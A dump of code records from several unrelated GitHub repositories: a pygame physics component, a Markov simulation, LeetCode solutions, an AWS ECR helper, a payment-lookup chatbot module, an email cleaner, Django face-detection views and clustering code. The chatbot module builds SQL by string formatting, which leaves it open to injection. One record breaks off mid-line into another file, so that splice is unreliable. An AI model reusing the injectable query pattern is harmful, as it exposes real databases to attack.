displacement):\n self.sprite.move(displacement)\n newx = self.position[0] + int(displacement[0])\n newy = self.position[1] + int(displacement[1])\n self.position = (newx, newy)\n\n def update_position(self, displacement):\n from src.Player import Player\n from src.Projectile import Projectile\n old_pos = self.position\n\n #update position\n self.move(displacement)\n\n #check for collisions\n if self.collides_with_tiles:\n #self.snap_out()\n #if isinstance(self.obj, Player) or isinstance(self.obj, Projectile):\n # copy = list(self.level.colliders)\n # self.push_out_colliders(copy)\n\n bounds = (32,32)\n\n vel_rect = None\n if displacement[0] >= 0:\n if displacement[1] >= 0:\n vel_rect = pygame.Rect(old_pos[0], old_pos[1],\n displacement[0]+bounds[0], displacement[1]+bounds[1])\n else:\n vel_rect = pygame.Rect(old_pos[0], old_pos[1] + bounds[1],\n displacement[0],\n displacement[1] + bounds[1])\n else:\n if displacement[1] >= 0:\n vel_rect = pygame.Rect(old_pos[0]+ bounds[0], old_pos[1],\n displacement[0], displacement[1]+bounds[1])\n else:\n vel_rect = pygame.Rect(old_pos[0]+ bounds[0], old_pos[1] + bounds[1],\n displacement[0],\n displacement[1])\n\n copy = []\n if self.collides_with_entities:\n #if isinstance(self.obj, Player) or isinstance(self.obj, Projectile):\n for ent in self.level.colliders:\n if ent is not self.obj:\n #if vel_rect.colliderect(ent.sprite.sprite_rect()):\n copy.append(ent)\n self.push_out_colliders(copy)\n\n #check if falling\n if old_pos[1]==self.position[1]:\n self.in_air = False\n else:\n self.in_air = True\n\n def update_velocity(self, acceleration):\n newx = self.velocity[0] + acceleration[0]\n newy = self.velocity[1] + acceleration[1]\n\n #cap the velocity\n if(newx>CONST_MAX_VELOCITY):\n newx = CONST_MAX_VELOCITY\n if(newy>CONST_MAX_VELOCITY):\n newy=CONST_MAX_VELOCITY\n\n self.velocity = (newx, newy)\n\n def update(self, deltatime):\n dt = deltatime / 1000\n\n # update parameters\n self.update_position((self.velocity[0] * dt, self.velocity[1] * dt))\n\n self.update_velocity(((self.acceleration[0] * dt, self.acceleration[1] * dt)))\n\n self.acceleration = (self.acceleration[0], self.gravity)\n","repo_name":"waivek/Medusa","sub_path":"src/MovingComponent.py","file_name":"MovingComponent.py","file_ext":"py","file_size_in_byte":12219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17972647180","text":"import numpy as np\r\nimport pandas as pd\r\n\r\n# Set up the initial state (all zeros)\r\ninitial_state = np.zeros(192, dtype=int)\r\n\r\n# Set up the state transition matrix\r\ntransition_matrix = np.array([[0.25, 0.25, 0.25, 0.25]] * 4)\r\n\r\n# Perform the simulation\r\nstate = initial_state\r\nstates = [] # List to store the states\r\nfor _ in range(10000): # however many steps you want\r\n for i in range(192):\r\n state[i] = np.random.choice(4, p=transition_matrix[state[i]])\r\n states.append(state.copy()) # Store the state\r\n\r\n# Convert the states to a DataFrame and save to a CSV file\r\ndf = pd.DataFrame(states)\r\ndf.to_csv('statese.csv', index=False)\r\n","repo_name":"SirFlickka/quantumQutrits","sub_path":"ap.py","file_name":"ap.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39488851674","text":"# 给定两个字符串S1 S2,写一个函数判断S2是否包含S1的排列\n# 换句话说 第1个字符串的排列之一是第2个字符串的子串。\n\nclass Solution:\n def checkInclusion(self,s1:str,s2:str):\n if (len(s1) str:\n return self._registry_id\n\n @staticmethod\n def findRegistry() -> object:\n registryId = None\n try:\n registryId = Session.ecr_client.describe_registry()['registryId']\n logging.info(f\"Found ECR Registry '{registryId}'\")\n except (IndexError, ClientError):\n logging.info(f\"ECR Registry not found\")\n return Registry(registryId) if registryId else None\n \n\n def findRepository(self: object, name: str) -> Repository: \n ecr_arn = None\n ecr_uri = None\n ecr_name = None\n try:\n repositories = Session.ecr_client.describe_repositories(\n registryId = self._registry_id, \n repositoryNames = [ name ]\n )['repositories']\n\n if len(repositories) == 0: raise IndexError(f\"Unable to find ECR repository '{name}'\")\n # intentionally not caught\n if len(repositories) != 1: raise RuntimeError(f\"Unexpected results. Expected 1 ECR repository but got {len(repositories)}\")\n repository = repositories[0]\n ecr_arn = repository['repositoryArn']\n ecr_uri = repository['repositoryUri']\n ecr_name = repository['repositoryName']\n logging.info(f\"Found ECR Repository '{ecr_name}': {ecr_uri}\")\n except (IndexError,ClientError):\n logging.info(f\"ECR Repository '{name}' not found\")\n return Repository(registry_id=self._registry_id, name=ecr_name, arn=ecr_arn, uri=ecr_uri) if ecr_name else None\n\n def getRepository(self: object, name: str, imageTagMutability: ImageTagMutability = ImageTagMutability.MUTABLE, scanOnPush: str = True) -> Repository:\n repository = self.findRepository(name)\n if repository: return repository\n\n ecr_arn = None\n ecr_uri = None\n ecr_name = None\n logging.info(f\"Creating ECR Registry '{name}'\")\n repository = Session.ecr_client.create_repository(\n registryId = self._registry_id,\n repositoryName = name, \n imageTagMutability=imageTagMutability.value, \n imageScanningConfiguration= {\n 'scanOnPush': scanOnPush\n }, \n encryptionConfiguration= {\n 'encryptionType': 'KMS'\n }\n )['repository']\n ecr_arn = repository['repositoryArn']\n ecr_uri = repository['repositoryUri']\n ecr_name = repository['repositoryName']\n logging.info(f\"Created ECR Repository '{name}': {ecr_uri}\")\n return Repository(registry_id=self._registry_id, name=ecr_name, arn=ecr_arn, uri=ecr_uri)\n","repo_name":"tomdemay/glcloud","sub_path":"common/ecr/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17340464986","text":"import pymysql, config, os\n\nfrom lib import wa, reply\nfrom module import kelas\n\ndef auth(data):\n if kelas.isParent(data[0]):\n ret=True\n else:\n ret=False\n return ret\n\ndef replymsg(driver, data):\n num=data[0]\n wmsg = reply.getWaitingMessage(os.path.basename(__file__).split('.')[0])\n wmsg = wmsg.replace('#BOTNAME#', config.bot_name)\n wa.typeAndSendMessage(driver, wmsg)\n npmmahasiswa=kelas.getStudentIdFromParentPhoneNumber(num)\n msgreply=''\n for i in npmmahasiswa:\n vadata = getVaData(i[0])\n virtualaccount = vadata[0]\n jumlahygharusdibayar = vadata[1]\n jumlahterakhirbayar = vadata[2]\n jumlahygsudahdibayar = vadata[3]\n waktuterakhirbayar = vadata[4].strftime('%d-%m-%Y %H:%M:%S')\n customername=vadata[5]\n msgreply+=\"Nama: {customername}\\nNomor virtual account: {virtualaccount}\\nTotal yang harus dibayar: {jumlahygharusdibayar}\\nTotal yang sudah dibayar: {jumlahygsudahdibayar}\\n\\nJumlah terakhir pembayaran: {jumlahterakhirbayar}\\nWaktu terakhir pembayaran: {waktuterakhirbayar}\\n\\n\".format(waktuterakhirbayar=waktuterakhirbayar, jumlahterakhirbayar=jumlahterakhirbayar, jumlahygsudahdibayar=jumlahygsudahdibayar, jumlahygharusdibayar=jumlahygharusdibayar, virtualaccount=virtualaccount, customername=customername)\n return msgreply\n\ndef dbConnectVA():\n db=pymysql.connect(config.db_host_va, config.db_username_va, config.db_password_va, config.db_name_va)\n return db\n\ndef getVaData(studentid):\n db=dbConnectVA()\n sql=\"select virtual_account, trx_amount, payment_amount, cumulative_payment_amount, datetime_payment, customer_name from payment_notification where trx_id like '%{npm}%' group by trx_id desc limit 1\".format(npm=studentid)\n with db:\n cur=db.cursor()\n cur.execute(sql)\n row=cur.fetchone()\n return row","repo_name":"riandakarizal/ITeung","sub_path":"module/va_parent.py","file_name":"va_parent.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10959975800","text":"import numpy\nimport pandas\nimport matplotlib.pyplot as plt\nfrom mlxtend.preprocessing import one_hot\n\ndef import_data():\n dataframe = pandas.read_csv('./Dataset1.csv')\n return dataframe\n\ndef info_data():\n data = import_data()\n print(data.head(10),\"\\n\") # print first 10 raws\n print(data.info(),\"\\n\") # print info about dataframe\n print(data.shape,\"\\n\") # print dataframe shape\n print(data.describe(),\"\\n\") # print info about values\n print(data.corr(),\"\\n\") # dataframe correlation\n\n # Convert object type to float type\n data.NGP=pandas.to_numeric(pandas.Series(data.NGP), errors='coerce');\n data.EGT=pandas.to_numeric(pandas.Series(data.EGT), errors='coerce');\n data.WF=pandas.to_numeric(pandas.Series(data.WF), errors='coerce');\n data.dropna(inplace=True) # Drop all NaN values\n\n # Graphics\n plt.plot(data['NGP'])\n plt.ylabel('Parameter N')\n plt.show()\n plt.plot(data['EGT'],color='red')\n plt.ylabel('Parameter EGT')\n plt.show()\n plt.plot(data['WF'],color='green')\n plt.ylabel('Parameter WF')\n plt.show()\n\ndef input_data():\n df = import_data() # import dataframe\n divide = 3584 # value for divide data on train and test\n df.drop('dateandtime',inplace=True,axis=1)\n # Convert object type to float type\n df.NGP=pandas.to_numeric(pandas.Series(df.NGP), errors='coerce');\n df.EGT=pandas.to_numeric(pandas.Series(df.EGT), errors='coerce');\n df.WF=pandas.to_numeric(pandas.Series(df.WF), errors='coerce');\n df.dropna(inplace=True)\n # Divide data on train and test without shuffle\n train_X = numpy.array(df.values[:divide,0:3])\n train_Y_p = numpy.array(df.values[:divide,3:])\n test_X = numpy.array(df.values[divide:,0:3])\n test_Y_p = numpy.array(df.values[divide:,3:])\n # Peapare one hot encode\n train_Y_p = train_Y_p.astype('int') # Convert to int type (train data)\n test_Y_p = test_Y_p.astype('int') # Convert to int type (test data)\n trf = train_Y_p.ravel() # Need be dimension 1, to encode in one hot\n tref = test_Y_p.ravel() # Need be dimension 1, to encode in one hot\n traf_Y = one_hot(trf, num_labels=3) # num_labels need be same as your classes (0,1,2)\n tres_Y = one_hot(tref, num_labels=3) # num_labels need be same as your classes (0,1,2)\n train_Y_en = numpy.array(traf_Y) # one hot numpy array (train data)\n test_Y_en = numpy.array(tres_Y) # one hot numpy array (test data)\n print(train_Y_en)\n\n # It is one hot:\n #_______________________________\n #|__good__|_anomaly_|_anomaly1_|\n #|____1___|____0____|_____0____|\n #|____0___|____1____|_____0____|\n #|____0___|____0____|_____1____|\n\n return train_X, test_X, train_Y_en, test_Y_en\n","repo_name":"CrazyPrisoner/multi_models","sub_path":"logistic_regression/logistic_regression_input.py","file_name":"logistic_regression_input.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35990288697","text":"from UI import *\r\nfrom functools import partial\r\n\r\ndef checkChangesMade(cls):\r\n if cls.changes == True:\r\n reply = QtGui.QMessageBox.question(cls, \"Save Changes?\", \"Would you like to save your changes?\"\r\n ,QtGui.QMessageBox.Yes, QtGui.QMessageBox.No, QtGui.QMessageBox.Cancel)\r\n if reply == QtGui.QMessageBox.Yes:\r\n cls.saveChanges()\r\n cls.changes = False\r\n return 0\r\n elif reply == QtGui.QMessageBox.Cancel:\r\n return 1\r\n else:\r\n cls.changes = False\r\n return 0\r\n else: \r\n cls.changes = False\r\n return 0\r\n \r\ndef initializeChangeTracking(cls,widget):\r\n if isinstance(widget,QtGui.QLineEdit):\r\n widget.textEdited.connect(partial(markAsChanged,cls))\r\n elif isinstance(widget, QtGui.QCheckBox):\r\n widget.clicked.connect(partial(markAsChanged,cls))\r\n elif isinstance(widget, QtGui.QComboBox):\r\n widget.activated.connect(partial(markAsChanged,cls))\r\n elif isinstance(widget, QtGui.QTextEdit):\r\n widget.undoAvailable.connect(partial(markAsChanged,cls))\r\n \r\n\r\ndef markAsChanged(cls):\r\n cls.changes = True\r\n \r\ndef populateTableRow(table, r, cols):\r\n for c, col in enumerate(cols):\r\n if isinstance(col, QtGui.QTableWidgetItem):\r\n table.setItem(r,c,col)\r\n else:\r\n table.setCellWidget(r,c,col)\r\n \r\n\r\ndef stateGenerator():\r\n states = \"\"\"Alabama,AL\r\nAlaska,AK\r\nArizona,AZ\r\nArkansas,AR\r\nCalifornia,CA\r\nColorado,CO\r\nConnecticut,CT\r\nDelaware,DE\r\nFlorida,FL\r\nGeorgia,GA\r\nHawaii,HI\r\nIdaho,ID\r\nIllinois,IL\r\nIndiana,IN\r\nIowa,IA\r\nKansas,KS\r\nKentucky,KY\r\nLouisiana,LA\r\nMaine,ME\r\nMaryland,MD\r\nMassachusetts,MA\r\nMichigan,MI\r\nMinnesota,MN\r\nMississippi,MS\r\nMissouri,MO\r\nMontana,MT\r\nNebraska,NE\r\nNevada,NV\r\nNew Hampshire,NH\r\nNew Jersey,NJ\r\nNew Mexico,NM\r\nNew York,NY\r\nNorth Carolina,NC\r\nNorth Dakota,ND\r\nOhio,OH\r\nOklahoma,OK\r\nOregon,OR\r\nPennsylvania,PA\r\nRhode Island,RI\r\nSouth Carolina,SC\r\nSouth Dakota,SD\r\nTennessee,TN\r\nTexas,TX\r\nUtah,UT\r\nVermont,VT\r\nVirginia,VA\r\nWashington,WA\r\nWest Virginia,WV\r\nWisconsin,WI\r\nWyoming,WY\"\"\".split(\"\\n\")\r\n for state in states:\r\n yield state.split(\",\")","repo_name":"dwhite91/Rudy","sub_path":"ScreenControl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37283274768","text":"#\n# @lc app=leetcode id=1771 lang=python3\n#\n# [1771] Maximize Palindrome Length From Subsequences\n#\n# https://leetcode.com/problems/maximize-palindrome-length-from-subsequences/description/\n#\n# algorithms\n# Hard (31.69%)\n# Likes: 111\n# Dislikes: 5\n# Total Accepted: 3K\n# Total Submissions: 9.3K\n# Testcase Example: '\"cacb\"\\n\"cbba\"'\n#\n# You are given two strings, word1 and word2. You want to construct a string in\n# the following manner:\n# \n# \n# Choose some non-empty subsequence subsequence1 from word1.\n# Choose some non-empty subsequence subsequence2 from word2.\n# Concatenate the subsequences: subsequence1 + subsequence2, to make the\n# string.\n# \n# \n# Return the length of the longest palindrome that can be constructed in the\n# described manner. If no palindromes can be constructed, return 0.\n# \n# A subsequence of a string s is a string that can be made by deleting some\n# (possibly none) characters from s without changing the order of the remaining\n# characters.\n# \n# A palindrome is a string that reads the same forward as well as backward.\n# \n# \n# Example 1:\n# \n# \n# Input: word1 = \"cacb\", word2 = \"cbba\"\n# Output: 5\n# Explanation: Choose \"ab\" from word1 and \"cba\" from word2 to make \"abcba\",\n# which is a palindrome.\n# \n# Example 2:\n# \n# \n# Input: word1 = \"ab\", word2 = \"ab\"\n# Output: 3\n# Explanation: Choose \"ab\" from word1 and \"a\" from word2 to make \"aba\", which\n# is a palindrome.\n# \n# Example 3:\n# \n# \n# Input: word1 = \"aa\", word2 = \"bb\"\n# Output: 0\n# Explanation: You cannot construct a palindrome from the described method, so\n# return 0.\n# \n# \n# Constraints:\n# \n# \n# 1 <= word1.length, word2.length <= 1000\n# word1 and word2 consist of lowercase English letters.\n# \n#\n\n# @lc code=start\nclass Solution:\n def longestPalindrome(self, word1: str, word2: str) -> int:\n s = word1 + word2\n m, n = map(len, (word1, word2))\n ans = 0\n\n dp = [[0] * (m + n) for _ in range(m + n)]\n for i in range(m + n - 1, -1, -1):\n dp[i][i] = 1\n for j in range(i + 1, m + n):\n if s[i] == s[j]:\n dp[i][j] = 2 + dp[i + 1][j - 1]\n if i < m and j >= m:\n ans = max(ans, dp[i][j])\n else:\n dp[i][j] = max(dp[i + 1][j], dp[i][j - 1])\n\n return ans\n\n\n\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"1771.maximize-palindrome-length-from-subsequences.py","file_name":"1771.maximize-palindrome-length-from-subsequences.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"12118558975","text":"import os\nimport tkinter as tk\nfrom tkinter import messagebox, filedialog\n\ndef compare_and_delete_bad_emails(bad_emails_file, all_emails_file):\n with open(bad_emails_file, 'r', encoding='utf-8') as f:\n bad_emails = set(f.read().splitlines())\n\n with open(all_emails_file, 'r', encoding='utf-8') as f:\n all_emails = f.read().splitlines()\n\n deleted_emails = []\n updated_emails = []\n\n for email in all_emails:\n if email in bad_emails:\n deleted_emails.append(email)\n else:\n updated_emails.append(email)\n\n with open(all_emails_file, 'w', encoding='utf-8') as f:\n f.write('\\n'.join(updated_emails))\n\n with open('deleted.txt', 'w', encoding='utf-8') as f:\n f.write('\\n'.join(deleted_emails))\n\n num_deleted_emails = len(deleted_emails)\n messagebox.showinfo(\"Cleanup Complete\", f\"Emails cleaned up!\\nDeleted {num_deleted_emails} email(s) and saved them to deleted.txt.\")\n\ndef browse_all_emails():\n file_path = filedialog.askopenfilename(filetypes=[(\"Text files\", \"*.txt\")])\n all_emails_entry.delete(0, tk.END)\n all_emails_entry.insert(tk.END, file_path)\n\ndef browse_bad_emails():\n file_path = filedialog.askopenfilename(filetypes=[(\"Text files\", \"*.txt\")])\n bad_emails_entry.delete(0, tk.END)\n bad_emails_entry.insert(tk.END, file_path)\n\ndef execute_comparison():\n all_emails_path = all_emails_entry.get()\n bad_emails_path = bad_emails_entry.get()\n\n if not os.path.exists(all_emails_path):\n messagebox.showerror(\"File Not Found\", f\"File not found: {all_emails_path}\")\n return\n\n if not os.path.exists(bad_emails_path):\n messagebox.showerror(\"File Not Found\", f\"File not found: {bad_emails_path}\")\n return\n\n if os.path.exists('deleted.txt'):\n os.remove('deleted.txt')\n print(\"Found old deleted.txt file and cleaned it.\")\n\n compare_and_delete_bad_emails(bad_emails_path, all_emails_path)\n\n\nwindow = tk.Tk()\nwindow.title(\"Compare and Delete Bad Emails\")\nwindow.geometry(\"400x250\")\n\n\nall_emails_label = tk.Label(window, text=\"All Emails File:\")\nall_emails_label.pack(pady=10)\n\nall_emails_entry = tk.Entry(window, width=40)\nall_emails_entry.pack(pady=5)\n\nbad_emails_label = tk.Label(window, text=\"Bad Emails File:\")\nbad_emails_label.pack(pady=10)\n\nbad_emails_entry = tk.Entry(window, width=40)\nbad_emails_entry.pack(pady=5)\n\nbuttons_frame = tk.Frame(window)\nbuttons_frame.pack()\n\nbrowse_all_emails_button = tk.Button(buttons_frame, text=\"Browse All Emails\", command=browse_all_emails)\nbrowse_all_emails_button.pack(side=tk.LEFT, padx=5)\n\nbrowse_bad_emails_button = tk.Button(buttons_frame, text=\"Browse Bad Emails\", command=browse_bad_emails)\nbrowse_bad_emails_button.pack(side=tk.LEFT, padx=5)\n\nexecute_button = tk.Button(window, text=\"Execute\", command=execute_comparison)\nexecute_button.configure(bg=\"blue\", fg=\"white\")\nexecute_button.pack(pady=10)\n\nwindow.mainloop()\n","repo_name":"chumachenkoo/EmailCleaner","sub_path":"email_cleaner.py","file_name":"email_cleaner.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17859766618","text":"import time\nimport cv2\nimport numpy as np\n\nfrom django.shortcuts import render, reverse, redirect\nfrom django.views.generic import CreateView\nfrom django.http import HttpResponse, StreamingHttpResponse\n\nfrom facedetection.tf_face.recognition import FaceCV, RecognizeFace\n\nfrom .forms import AddFaceForm\nfrom .models import EmbeddingsModel\n\nfrom cvision import settings\n\nface_cv = FaceCV()\nface_recon = RecognizeFace()\n\nvideo = cv2.VideoCapture(0)\n\n\ndef raw_face_feed():\n while True:\n ret, frame = video.read()\n raw_face_feed.frame = frame\n frame = cv2.imencode('.jpg', frame)[1].tostring()\n yield (b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\ndef frame_feed():\n while True:\n ret, frame = video.read()\n frame = face_cv.analyze_frame(frame, include_body=settings.INCLUDE_BODY,\n skip_frames=settings.SKIP_FRAMES, include_identity=True)\n frame = cv2.imencode('.jpg', frame)[1].tostring()\n yield (b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n # time.sleep(0.05)\n\n\ndef read_video():\n with open(settings.VIDEO_PATH, 'rb') as file:\n bytes_video = file.read()\n return bytes_video\n\n\nclass AddNewFaceView(CreateView):\n template_name = 'facedetection/add_face.html'\n form_class = AddFaceForm\n\n def get(self, request, *args, **kwargs):\n form = self.form_class()\n context = {\"form\": form}\n return render(request, template_name=self.template_name, context=context)\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n\n if form.is_valid():\n model = form.save(commit=False)\n\n embedding = face_recon.create_embedding(raw_face_feed.frame)\n\n if embedding:\n model.embedding = embedding\n model.save()\n\n context = {}\n return render(request, template_name=self.template_name, context=context)\n return redirect(reverse('facedetection:add-face'))\n\n\nclass DetectFaceView(CreateView):\n template_name = 'facedetection/detect_face.html'\n\n def get(self, request, *args, **kwargs):\n context = {}\n return render(request, template_name=self.template_name, context=context)\n\n def post(self, request, *args, **kwargs):\n context = {}\n return render(request, template_name=self.template_name, context=context)\n\n\nclass StreamRawFaceView(CreateView):\n def get(self, request, *args, **kwargs):\n return StreamingHttpResponse(raw_face_feed(), 'multipart/x-mixed-replace; boundary=frame')\n\n\nclass StreamFaceView(CreateView):\n\n def get(self, request, *args, **kwargs):\n return StreamingHttpResponse(frame_feed(), 'multipart/x-mixed-replace; boundary=frame')\n","repo_name":"diyor28/cvproject","sub_path":"facedetection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41850305751","text":"\"\"\"\nFile containing methods for unsupervised clustering of time series\n\"\"\"\nimport random\n\nimport numpy as np\nimport scipy.spatial.distance as ssd\nfrom keras import regularizers\nfrom keras.layers import Dense\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom keras.optimizers import SGD\nfrom sklearn.cluster import AgglomerativeClustering, KMeans\nfrom tslearn.metrics import cdist_dtw\nfrom tslearn.utils import to_time_series, to_time_series_dataset\n\nfrom analyzer.metrics import calculate_metrics\nfrom preprocessing.gen_input import get_gaussian, select_data\nfrom preprocessing.variables import variables\n\nrandom.seed(1)\n\nfrom clustering.DECLayer import DECLayer\n\n\ndef to_timeseries_set(df, var):\n ids = list(df['studyID'].unique())\n selected_ids = random.sample(ids, 10)\n print(len(ids))\n ts = []\n empty = 0\n count = 0\n for Id in selected_ids:\n count += 1\n sub_df, stop = select_data(df, Id, var)\n if len(sub_df.index) > 1:\n x = sub_df.loc[sub_df['value_name'] == variables[var]['Name']]['Reltime']\n y = sub_df.loc[sub_df['value_name'] == variables[var]['Name']]['value']\n _, y_pred, _ = get_gaussian(x, y, stop, var)\n y_pred = to_time_series(y_pred)\n ts.append(y_pred)\n\n dat = to_time_series_dataset(ts)\n print(dat.shape)\n print(\"nr ids: \", count)\n return dat, empty\n\n\ndef to_distances(ts_dataset):\n m = cdist_dtw(ts_dataset)\n m = ssd.squareform(m)\n return m\n\n\ndef cluster_hierarchical_n(d_matrix, n_classes):\n clustering = AgglomerativeClustering(n_clusters=n_classes, affinity='precomputed', linkage='complete').fit(d_matrix)\n return clustering.labels_\n\n\ndef cluster_hierarchical(feature_array, n_classes):\n clustering = AgglomerativeClustering(n_clusters=n_classes, linkage='complete').fit(feature_array)\n return clustering.labels_\n\n\ndef cluster_kmeans(feature_array, n_classes):\n clustering = KMeans(n_clusters=n_classes).fit(feature_array)\n return clustering.labels_\n\n\ndef target_distribution(q):\n weight = q ** 2 / q.sum(0)\n return (weight.T / weight.sum(1)).T\n\n\ndef dec_cluster(encoder, feature_array, y, n_classes):\n clustering_layer = DECLayer(n_classes, name='clustering')(encoder.output)\n model = Model(inputs=encoder.input, outputs=clustering_layer)\n model.compile(optimizer=SGD(0.01, 0.9), loss='kld')\n\n kmeans = KMeans(n_clusters=n_classes, n_init=20)\n y_pred = kmeans.fit_predict(encoder.predict(feature_array))\n y_pred_last = np.copy(y_pred)\n\n model.get_layer(name='clustering').set_weights([kmeans.cluster_centers_])\n\n loss = 0\n index = 0\n maxiter = 8000\n batch_size = 256\n update_interval = 140\n index_array = np.arange(feature_array.shape[0])\n\n tol = 0.01 # tolerance threshold to stop training\n\n for ite in range(int(maxiter)):\n if ite % update_interval == 0:\n q = model.predict(feature_array, verbose=0)\n p = target_distribution(q) # update the auxiliary target distribution p\n\n # evaluate the clustering performance\n y_pred = q.argmax(1)\n if y is not None:\n acc, ari, loss, nmi = calculate_metrics(loss, y, y_pred)\n print('Iter %d: acc = %.5f, nmi = %.5f, ari = %.5f' % (ite, acc, nmi, ari), ' ; loss=', loss)\n\n # check stop criterion - model convergence\n delta_label = np.sum(y_pred != y_pred_last).astype(np.float32) / y_pred.shape[0]\n y_pred_last = np.copy(y_pred)\n if ite > 0 and delta_label < tol:\n print('delta_label ', delta_label, '< tol ', tol)\n print('Reached tolerance threshold. Stopping training.')\n break\n idx = index_array[index * batch_size: min((index + 1) * batch_size, feature_array.shape[0])]\n loss = model.train_on_batch(x=feature_array[idx], y=p[idx])\n index = index + 1 if (index + 1) * batch_size <= feature_array.shape[0] else 0\n\n q = model.predict(feature_array, verbose=0)\n p = target_distribution(q) # update the auxiliary target distribution p\n\n # evaluate the clustering performance\n y_pred = q.argmax(1)\n if y is not None:\n acc, ari, loss, nmi = calculate_metrics(loss, y, y_pred)\n print('Acc = %.5f, nmi = %.5f, ari = %.5f' % (acc, nmi, ari), ' ; loss=', loss)\n\n return y_pred, q\n\n\ndef cluster_mlp_autoencoder(feature_array, n_classes, y=None, neurons_h=64, neurons_e=8, epochs=500, batch_size=64):\n input_arr = Input(shape=(feature_array.shape[1],))\n encoded = Dense(neurons_h, activation='relu', activity_regularizer=regularizers.l1(10e-5))(input_arr)\n encoded = Dense(neurons_e, activation='relu')(encoded)\n\n decoded = Dense(neurons_h, activation='relu')(encoded)\n decoded = Dense(feature_array.shape[1], activation='sigmoid')(decoded)\n\n autoencoder = Model(input_arr, decoded)\n encoder = Model(input_arr, encoded)\n\n autoencoder.compile(optimizer='adam', loss='mean_squared_error')\n\n autoencoder.fit(feature_array, feature_array,\n epochs=epochs,\n batch_size=batch_size,\n shuffle=True)\n\n y_pred, y_proba = dec_cluster(encoder, feature_array, y, n_classes)\n\n return y_pred, y_proba\n","repo_name":"J1C4F8/SICS_DEC","sub_path":"clustering/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"23528105206","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('tiles', '0024_remove_tile_in_stock'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Portfolio',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('user', models.ForeignKey(verbose_name='Portfolio', to=settings.AUTH_USER_MODEL, related_name='portfolio')),\n ],\n ),\n migrations.AddField(\n model_name='tile',\n name='customized',\n field=models.BooleanField(verbose_name='Customized', default=False),\n ),\n migrations.AddField(\n model_name='tile',\n name='portfolio',\n field=models.ForeignKey(verbose_name='Portfolio', to='tiles.Portfolio', blank=True, related_name='tiles', null=True),\n ),\n ]\n","repo_name":"rogergaitan/granadatiles","sub_path":"granadatiles_project/apps/tiles/migrations/0025_auto_20151204_2313.py","file_name":"0025_auto_20151204_2313.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5878765038","text":"import sys\nimport os\nimport numpy as np\nimport pickle\nimport argparse\nfrom zosapi.util import extractZernikeCoefficents\n\n\"\"\"\nTest the models on a sample data\n\"\"\"\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-f\", \"--file\", help=\"path of the file contaning the zernike coefficient (from Zemax configuration)\")\n args = parser.parse_args()\n\n filename = args.file\n coefficients = extractZernikeCoefficents(filename)\n\n X = coefficients[:16]\n model_class = pickle.load(open(\"models/rfc_model.pkl\", \"rb\"))\n\n reg0 = pickle.load(open(\"models/reg0.pkl\", \"rb\"))\n reg1 = pickle.load(open(\"models/reg1.pkl\", \"rb\"))\n reg2 = pickle.load(open(\"models/reg2.pkl\", \"rb\"))\n reg3 = pickle.load(open(\"models/reg3.pkl\", \"rb\"))\n\n print('Proabability of misalignment of each component (with specific parameter in each component):-')\n prob = model_class.predict_proba(X.reshape(1, -1))[0] * 100\n\n elements = ['Primary Mirror', 'Secondary Mirror', 'Lens', 'CCD']\n regmodels = [reg0, reg1, reg2, reg3]\n\n print()\n for i in range(4):\n print(\"%s -> %0.2f %%\" % (elements[i], prob[i]))\n comp_prob = regmodels[i].predict(X.reshape(1, -1))[0]\n\n print('Decenter in X:', comp_prob[0])\n print('Decenter in Y:', comp_prob[1])\n print('Tilt about X:', comp_prob[2])\n print('Tilt about Y:', comp_prob[3])\n print('-----------------------')\n print()\n","repo_name":"sashank27/Aulign","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18705082980","text":"from setuptools import setup\n\npackage_name = 'bag_recorder'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='cjc',\n maintainer_email='christianjc_09@yahoo.com',\n description='TODO: Package description',\n license='TODO: 